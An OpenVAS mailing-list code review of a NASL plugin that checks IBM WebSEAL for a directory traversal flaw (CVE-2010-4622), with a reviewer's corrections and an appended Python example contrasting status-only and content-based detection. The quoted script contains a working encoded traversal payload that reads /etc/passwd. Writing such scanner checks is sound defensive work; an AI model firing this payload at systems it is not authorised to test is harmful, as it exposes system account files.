Hello,
*** Info Sec <[email protected]> wrote:
> I attempted to look through documentation and looked at other files to
> figure out how to write one of these things. One thing that still confuses
> me is that I want the check on both port 80 and 443, but I'm not sure I'm
> doing that part right. Please feel free to shred it up, I'm hoping to learn
> more through this. There are still some lines in there I'm using for
> debugging.
> -------------------
> if( description )
> {
> script_id(33333);
> script_version ("$Revision:0.1$");
> script_name(english:"IBM Tivoli Access Manager for e-business WebSEAL URL
^^^^^^^^
There is no more "internationalization" in our Plugins. See
http://openvas.org/openvas-cr-36.html
> desc =
> "There is a directory traversal flaw in WebSEAL versions <= 6.1.1. Some
> reports show it only affecting AIX, but
> testing has shown other operating systems to be vulnerable and code
> execution has been shown to work.
>
> Risk Factor : High";
>
> script_description(desc);
> script_summary(english:"WebSEAL traversal check");
> script_category(ACT_GATHER_INFO);
This should be ACT_ATTACK in this case.
> script_family(english:"Remote file access");
> script_copyright(english:"This script is Copyright (C) 2011 name");
> script_cve_id("CVE-2010-4622");
> script_dependencie("http_version.nasl");
> script_require_ports("Services/www", 80, 443);
> exit(0);
> }
>
> include ("http_func.inc");
> include ("http_keepalive.inc");
>
> port = get_http_port(default:80);
> if(!get_port_state(port))
> exit(0);
> {
> port = get_http_port(default:443);
> if(!get_port_state(port))
> exit(0);
> }
This is not needed. "port = get_http_port(default:80);" will fork for every
detected http(s) port.
> banner = get_http_banner(port:port);
if( ! banner || "WebSEAL/" >!< banner)exit(0);
> if (!ereg(pattern:"WebSEAL/[0-6].[0-1]",string:serv))
if (!ereg(pattern:"WebSEAL/[0-6].[0-1]",string:banner))
> dir_trav =
> "/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e\%uff0e%uff0e/etc/passwd";
>
> {
> req = http_get(item: dir_trav, port:port);
> res = http_keepalive_send_recv(port:port, data:req);
> if (res == NULL) exit(0);
>
> if (ereg(pattern:"HTTP/[0-9]\.[0-9] 200 ", string:res))
That's not enough to be sure the exploit is working.
if (egrep(pattern:"root:.*:0:[01]:.*:", string:res)) {
> {
> display(res);
> security_hole(port);
> exit(0);
> }
> }
Best Regards,
Micha
--
Michael Meyer OpenPGP Key: 52A6EFA6
http://www.greenbone.net/
Greenbone Networks GmbH, Neuer Graben 17, 49074 Osnabrück | AG
Osnabrück, HR B 202460
Managing Directors: Lukas Grunwald, Dr. Jan-Oliver Wagner
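The point Micha raises about the final check (a 200 status on its own versus a response body that really carries a passwd entry), shown as an added Python example that is not part of this thread or of any OpenVAS plugin; the three HTTP responses are constructed for illustration and the function names are my own:

```python
import re

# Constructed sample responses (not captured from a real host): a real leak,
# a "soft 404" that answers 200 with an error page, and a plain 404.
RESPONSES = {
    "leaked": (
        "HTTP/1.1 200 OK\r\nServer: WebSEAL/6.1.0\r\nContent-Type: text/plain\r\n\r\n"
        "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"
    ),
    "soft_404": (
        "HTTP/1.1 200 OK\r\nServer: WebSEAL/6.1.0\r\nContent-Type: text/html\r\n\r\n"
        "<html><body>The page you requested could not be found.</body></html>\n"
    ),
    "hard_404": "HTTP/1.1 404 Not Found\r\nServer: WebSEAL/6.1.0\r\n\r\n",
}

STATUS_200 = re.compile(r"^HTTP/[0-9]\.[0-9] 200 ")      # the submitted check
PASSWD_ROOT = re.compile(r"root:.*:0:[01]:.*:")         # the pattern Micha suggests


def is_webseal(banner: str) -> bool:
    """Banner gate, the same idea as the suggested '"WebSEAL/" >!< banner' test."""
    return bool(banner) and "WebSEAL/" in banner


def status_only(response: str) -> bool:
    """Submitted logic: any 200 reply is reported as vulnerable."""
    return STATUS_200.match(response) is not None


def content_verified(response: str) -> bool:
    """Reviewed logic: only a reply containing a root passwd entry counts."""
    return PASSWD_ROOT.search(response) is not None


def classify(responses):
    """Map each sample to (status_only verdict, content_verified verdict)."""
    return {name: (status_only(r), content_verified(r)) for name, r in responses.items()}


if __name__ == "__main__":
    for name, (by_status, by_content) in classify(RESPONSES).items():
        print(f"{name:9s} status-only={by_status!s:5s} content-verified={by_content}")
```

The soft-404 sample is where the two checks diverge: the status-only test reports it as a hit, while the content test does not.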
_______________________________________________
Openvas-plugins mailing list
[email protected]
http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins